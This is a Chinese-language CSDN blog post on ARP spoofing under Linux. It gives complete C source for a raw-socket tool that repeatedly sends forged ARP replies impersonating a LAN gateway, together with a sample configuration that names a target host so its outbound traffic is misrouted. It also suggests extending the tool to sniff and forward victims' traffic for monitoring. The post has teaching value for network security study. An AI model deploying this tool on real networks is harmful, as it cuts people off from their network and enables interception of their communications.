Linux网络环境下的ARP攻击

最新推荐文章于 2022-04-29 08:45:12 发布
最新推荐文章于 2022-04-29 08:45:12 发布
阅读量577 收藏
点赞数
分类专栏: 网络相关 文章标签: ARP欺骗 网络 网络编程
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tertt4/article/details/42462829
版权

注:本文旨在对知识的学习与实践,请勿用于不正常的途径。

ARP攻击的基本原理很简单,通过百度百科的知识就能了解。其主要原理是通过ARP包,进行主机或网关的欺骗。

我将ARP欺骗大致分为两类:

(一)欺骗主机:通常是伪装成网关(不想让欺骗主机上网)或局域网的某一台机器(不想让欺骗主机与这台主机进行通信),给被欺骗主机发送ARP响应包。

(二)欺骗网关:通常是伪装成某一台机器,给网关发送ARP响应包,这样会导致在以后的通信中,网关发回来的数据包到达不了某一主机。

在上面的过程中,发送ARP请求包也是可以的,但请求包通常是以广播形式发送的,这样对交换机的负载比较大,虽然现在的交换机性能很强大,但能避免就避免吧。

现在主机192.168.100.73想要欺骗192.168.100.72,想让72这台主机上不去网,具体来说就是所有通向外网的数据包都转到73上。我们知道,如果目的IP和本主机不在同一网段,那么下一跳就会走默认网关,因此,只要伪装默认网关给72这台主机发送错误的ARP响应包,就会导致72的数据包走到错误的链路上去,这里还涉及一个交换机自学习的知识。

具体的代码

/********************************************************************************                                                        
** 
** Email :        jiashadidai110@gmail.com
** 
** Author:        Contestjia
** 
** Filename:      arp_12.6.c
** 
** Last modified: 2015-01-06 18:47:30
** 
********************************************************************************/
#include <stdio.h>
#include <net/if_arp.h>
#include <netinet/if_ether.h>
#include <netinet/tcp.h>
#include <netinet/ether.h>
#include <stdint.h>
#include <memory.h>
#include <stdlib.h>
#include <arpa/inet.h>
#include <string.h>
#include <netpacket/packet.h>
#include <linux/if_ether.h>
#define ARPLEN     (60)
#define MACSTRLEN  (18)
#define IPSTRLEN   (16)
#define ETHNAMELEN (6)
char DHOSTMAC[MACSTRLEN];
char SHOSTMAC[MACSTRLEN];
char DHOSTIP[IPSTRLEN];
char SHOSTIP[IPSTRLEN];
char ETHNAME[ETHNAMELEN];
extern  char *optarg;
static void
InitArp(struct ether_arp *ether_arp)
{
    (ether_arp->ea_hdr).ar_hrd = htons(ARPHRD_ETHER);
    (ether_arp->ea_hdr).ar_pro = htons(ETHERTYPE_IP);
    (ether_arp->ea_hdr).ar_hln = 6;
    (ether_arp->ea_hdr).ar_pln = 4;
    (ether_arp->ea_hdr).ar_op  = htons(ARPOP_REPLY);
    memcpy(ether_arp->arp_sha,
           ether_aton(SHOSTMAC),
           ETH_ALEN);
    memcpy(ether_arp->arp_tha,
           ether_aton(DHOSTMAC),
           ETH_ALEN);
    inet_pton(AF_INET,
              SHOSTIP,
              ether_arp->arp_spa
              );
    inet_pton(AF_INET,
              DHOSTIP,
              ether_arp->arp_tpa
              );
}
static void
InitEtherHeader(struct ether_header *ether_header)
{   
    
    memcpy( ether_header->ether_dhost,
            ether_aton(DHOSTMAC),
            ETH_ALEN);
    memcpy( ether_header->ether_shost,
            ether_aton(SHOSTMAC),
            ETH_ALEN
            );
    ether_header->ether_type = htons(ETHERTYPE_ARP);
}
static void
readcfgfile(char *file_name)                                                                                                                 
{
    FILE *fp = NULL;
#define MAXSIZE 255
    char buf[MAXSIZE];
    char *ptr;
    if((fp = fopen(file_name,"r")) == NULL)
    {
        perror("readcfgfile");
        exit(0);
    }
    while(fgets(buf,MAXSIZE,fp) != 0)
    {
        if(buf[0] == '#')
            continue;
        if(strstr(buf,"SHOSTMAC=")){
            u_int8_t len = strlen(buf);
            if(buf[len - 1] == '\n')
                buf[len - 1] = 0;
            ptr = buf + strlen("SHOSTMAC=");
            strcpy(SHOSTMAC, ptr);
        }else if(strstr(buf,"DHOSTMAC=")){
            u_int8_t len = strlen(buf);
            if(buf[len - 1] == '\n')
                buf[len - 1] = 0;
            ptr = buf + strlen("DHOSTMAC=");
            strcpy(DHOSTMAC, ptr);
        }else if(strstr(buf,"SHOSTIP=")){
            u_int8_t len = strlen(buf);
            if(buf[len - 1] == '\n')
                buf[len - 1] = 0;
            ptr = buf + strlen("SHOSTIP=");
            strcpy(SHOSTIP, ptr);
        }else if(strstr(buf,"DHOSTIP=")){
            u_int8_t len = strlen(buf);
            if(buf[len - 1] == '\n')
                buf[len - 1] = 0;
            ptr = buf + strlen("DHOSTIP=");                                                                                                  
            strcpy(DHOSTIP, ptr);
            printf("Attack IP is : %s\n",DHOSTIP);
        }else{           printf("Parameter is error!!!\n");
            exit(0);
        }
    }
#undef MAXSIZE
}

static u_int8_t
parse_args(u_int32_t argc,u_int8_t **argv)
{
    u_int8_t count = 0;
    register int op;
    const char *opts = "f:F:i:I:";
    while( (op = getopt(argc, argv, opts) ) != -1) switch(op) {
        case 'f':
        case 'F':
            {
                count++;
                readcfgfile(optarg);
                break;
            }
        case 'i':
        case 'I':
            {
                count++;
                memcpy(ETHNAME, optarg,strlen(optarg));
                break;
            }
        default:
            break;
    }
    return count;
}
                                                                                                                                             
int main(u_int32_t argc, u_int8_t **argv)
{
    u_int8_t  count = 0;    count = parse_args(argc,argv);
    if(count != 2)
    {
        printf("Please input the arp_file!!!!\n");
        exit(0);
    }
    u_int8_t *arp = (u_int8_t*)malloc(sizeof(char) * ARPLEN);
    memset(arp, 0 , ARPLEN);
    struct ether_header *ether_header = (struct ether_header*)(arp);
    struct ether_arp    *ether_arp = (struct ether_arp*)(arp + sizeof(struct ether_header));
    InitEtherHeader(ether_header);
    InitArp(ether_arp);
    
    //bind  socket
    int32_t fd;
    if((fd = socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ARP))) < 0)
    {
        perror("socket error!!\n");
        exit(0);
    }
    struct sockaddr_ll send;
    memset(&send, 0 ,sizeof(send));
    send.sll_family = PF_PACKET;
    send.sll_ifindex = if_nametoindex(ETHNAME);
    u_int32_t pkt_num = 0;
    while(1){
        sendto(fd, arp , ARPLEN, 0, (struct sockaddr*)&send, sizeof(send));
        pkt_num++;
        printf("<<<<<Send %d packet>>>>>\n", pkt_num);
        sleep(5);
    }
}                             

程序采用命令行方式与配置文件相结合。

配置文件的格式如下:

#destination mac                                                                                                                             
DHOSTMAC=00:23:24:44:72:41
#destination ip
DHOSTIP=192.168.100.72
#source  mac
SHOSTMAC=00:0F:F4:19:78:A9
#source  ip
SHOSTIP=192.168.100.1
配置文件中的destination mac和destination ip是被欺骗主机的真实IP和mac,这个必须正确。由于是要伪装网关,我的网关IP为192.168.100.1,所以source ip为192.168.100.1,而source mac为任意错误的mac地址就行,这样192.168.100.72发出的外网数据包都会到这个mac的主机上。

程序运行的命令格式为:

其中 -i 指定发送数据包的接口为eth2,这个接口是有要求的,必须与被欺骗主机的ip在同一个局域网,-f 指定存放配置的文件名。

由于程序旨在完成ARP欺骗这一功能,因此对于其他可能导致程序运行出错的情况,没有在程序中一一都列举到。


以上就完成了ARP欺骗的功能。其中涉及的知识点有:linux网络编程、交换机自学习、IP路由表查找、ARP地址表查找。理解这些对网络通信比较有好处。


拓展:如果我们同时对网关进行欺骗,然后在发送ARP欺骗数据包的机器上进行混杂捕包、解析、转发,这样我们就可以实现对某一局域网用户的上网行为进行分析,但这中间涉及更多、更杂的知识,有兴趣的可以继续讨论。

contestjia
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
基于kali linux进行的ARP攻击的方法(上)
m0_52027565的博客
05-30 474
作为一个性接触信息安全专业的菜鸟,最近突然对ARP产生了兴趣。下面来谈谈我对ARP的理解。 ARP的学习步骤: ARP原理(通讯协议的初步了解包括Wireshark) Address Resolution Protocol(即ARP)是根据IP地址获取物理地址的一个TCP/IP协议。主机发送信息时将包含目标IP地址的ARP发送到局域网上的所有主机,并接收返回消息确定MAC地址;在接收到返回消息后将该IP地址和MAC地址存入本机ARP缓存中,等下次请求时直接查询。用宿舍举例如下图所示: 说以我们可以使我们
ensp加kali实现arp欺骗攻击
最新发布
04-21
本文将深入探讨如何使用Kali Linux这一专业安全操作系统,配合ENSPI(Ethernet Network Simulation Platform,以太网网络模拟平台)来实现ARP欺骗攻击,并了解这种攻击可能导致的后果。 首先,我们需要理解ARP的...
linuxarp攻击的解决方案
软体疯子专栏
01-13 2674
必备软件 Libnet 官方网站 下载地址 arpoison 官方网站 下载地址 安装方法(FC下成功,其他发行版
linuxarp攻击实现
cangyingzhijia的专栏
11-05 6725
arp攻击arp病毒曾经疯狂的流行了一阵子。下面是简单的arp攻击原来的实现例子,只是一个示例,离真正的arp攻击还有一点距离,现在的arp攻击越来越隐蔽越来越高科技了。(尽量少用,很容易使攻击的主机瘫痪)  #include #include #include #include #include #include #include #include
Linux网络ARP攻击
架构师亮哥的博客
04-04 242
1.ARP协议 地址解析协议,Address Resolution Protocol,用于实现IP地址到MAC地址映射(知道IP问MAC),实现数据的封装过程。ARP协议是在Ethernet以上,属于网络层。 ARP数据包: image 字段1是ARP请求的目的以太网地址,全1时代表广播地址。 字段2是发送ARP请求的以太网地址。 字段3以太网帧类型表示的是后面的数据类型,ARP请求...
linux防火墙arp攻击,解决linuxarp攻击的方法
weixin_28703451的博客
05-12 376
一般Windows用户可以使用antiArp防火墙,但是有些计算专业的朋友们由于工作或其他原因使用的是linux系统,那么linuxarp攻击怎么办呢?下面就是一位高手解决linuxarp攻击的方法,大家可以学习一下。高手用的是fedora core 6,先把几个镜像文件挂上,用关键字 arp 一搜,就搜到了arptables,和arpwatcher 首先是arpwatcher了,它好像只能监...
Linux系统中ARP欺骗攻击的防范.pdf
09-06
网络安全领域,ARP欺骗是一种常见的攻击手段,尤其在Linux操作系统中,由于ARP协议的特性,攻击者可以利用它来干扰网络通信,导致数据包被错误地转发,甚至窃取敏感信息。ARP(Address Resolution Protocol)协议...
Linux系统下ARP数据包截取和分析.pdf
09-06
这种方法能够成功捕获和分析ARP数据包,对于检测ARP攻击、识别网络拥堵源和优化网络资源分配具有实际价值。 5. 应用场景: 在高校环境中,由于ARP病毒的频繁出现,这种数据包截取和分析技术尤为重要,可以帮助监测...
arp广播发送和接收linux程序
11-29
例如,可以用来测试网络中是否存在ARP响应延迟问题,或者用于模拟ARP攻击以检测网络的防御能力。 总结,理解ARP协议及其在Linux环境下的编程实现对于深入理解网络通信至关重要。通过编写发送和接收ARP广播的程序,...
linux下原始socket实现ARP局域网欺骗工具
08-23
为了安全使用这样的工具,需要深入理解ARP协议和可能的风险,以免无意中破坏网络环境或触犯法律。 总结起来,Linux下的原始套接字提供了对ARP协议的底层访问,使得开发者能够实现ARP欺骗工具。这种工具虽然在网络...
关于ARP攻击的原理以及在Kali Linux环境下的实现
weixin_34203832的博客
11-23 537
关于ARP攻击的原理以及在Kali Linux环境下的实现 全文摘要 本文讲述内容分为两部分,前半部分讲述ARP协议及ARP攻击原理,后半部分讲述在Kali Linux环境下如何实现ARP攻击以及ARP欺骗,如果对于ARP攻击的背景和原理不感兴趣的话可以直接翻到下面查看操作方法 ARP协议 基本功能 局限性 攻击原理 Kali Linux下的实现 ARP攻击 ARP欺骗 ARP协议 ...
arpspoof安装和5分钟基于linux-kali的arp攻击防御示例(保姆级图文)【网络工程】
MZH
03-14 1万+
arpspoof安装和5分钟基于linux-kali的arp攻击防御示例(保姆级图文)【网络工程】
linux arp 攻击源码分析
xiaopangzi313的专栏
01-02 1101
arp 协议详解 攻击原理 简单攻击源码  一.             关于ARP协议的基础知识 1.ARP的工作原理 我们都知道以太网设备比如网卡都有自己全球唯一的MAC地址,它们是以MAC地址来传输以太网数据包的,但是它们却识别不了我们IP包中的IP地址,所以我们在以太网中进行IP通信的时候就需要一个协议来建立IP地址与MAC地址的对应关系,以使IP数据包能发到一个确定的地方去。这就是
网络攻击工具yersinia
cnbird's blog
08-27 3287
http://www.yersinia.net/ http://blog.163.com/k_hunter/blog/static/295037242010594622917/
linux下socket编程常用头文件
weixin_44522306的博客
05-29 1778
转 https://blog.csdn.net/u014647517/article/details/38777413 sys/types.h:数据类型定义 sys/socket.h:提供socket函数及数据结构 netinet/in.h:定义数据结构sockaddr_in arpa/inet.h:提供IP地址转换函数 netdb.h:提供设置及获取域名的函数 sys/ioctl.h:提供对I/...
网络编程头文件与数据结构
m0_67403272的博客
04-29 352
网络编程头文件与数据结构 2009-09-07 13:56:21| 分类: 网络编程 | 标签: |字号大中小 订阅 今天需要解决的问题是,获取网卡的ip地址,将其赋值给虚拟网卡获得的包的对应域中 这里的情况是,由于我写到虚拟网卡上的包是原始包(raw socket),因此先是14个字节的以太包头,然后才是ip的包头,我算了一下偏移量,是26个字节结束,从27个字节开始是ipheader中的ip域,32位长的int型。 在linux中,用数据结构ifreq记录跟网卡接口有关的信息 struct ifreq
Unix环境编程常用头文件
yang_chen_shi_wo的博客
11-29 1657
1.1.       primitive system data types(包含很多类型重定义,如pid_t、int8_t等) 1.2.       //与套接字相关的函数声明和结构体定义,如socket()、bind()、connect()及struct sockaddr的定义等   int setsockopt(int s,int level,int opt
Linux网络编程常用头文件解释
Poo_Chai的博客
10-13 2219
sys/types.h:数据类型定义 sys/socket.h:提供socket函数及数据结构 netinet/in.h:定义数据结构sockaddr_in arpa/inet.h:提供IP地址转换函数 netdb.h:提供设置及获取域名的函数 sys/ioctl.h:提供对I/O控制的函数 sys/poll.h:提供socket等待测试机制的函数 其他在网络程序中常见的头文件 ...
linux网络编程常用头文件
热门推荐
cqkxboy168的专栏
06-18 1万+
sys/types.h:数据类型定义 sys/socket.h:提供socket函数及数据结构 netinet/in.h:定义数据结构sockaddr_in arpa/inet.h:提供IP地址转换函数 netdb.h:提供设置及获取域名的函数 sys/ioctl.h:提供对I/O控制的函数 sys/poll.h:提供socket等待测试机制的函数 其他在网络程序中常见的头文件
Kali Linux网络扫描实战指南
"《Kali Linux Network Scanning Cookbook》是一本关于Kali Linux网络扫描技术的书籍,由Justin Hutchens撰写。这本书旨在帮助读者掌握网络扫描的各种技术和工具,包括起步、探索扫描、端口扫描、指纹识别、漏洞扫描...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值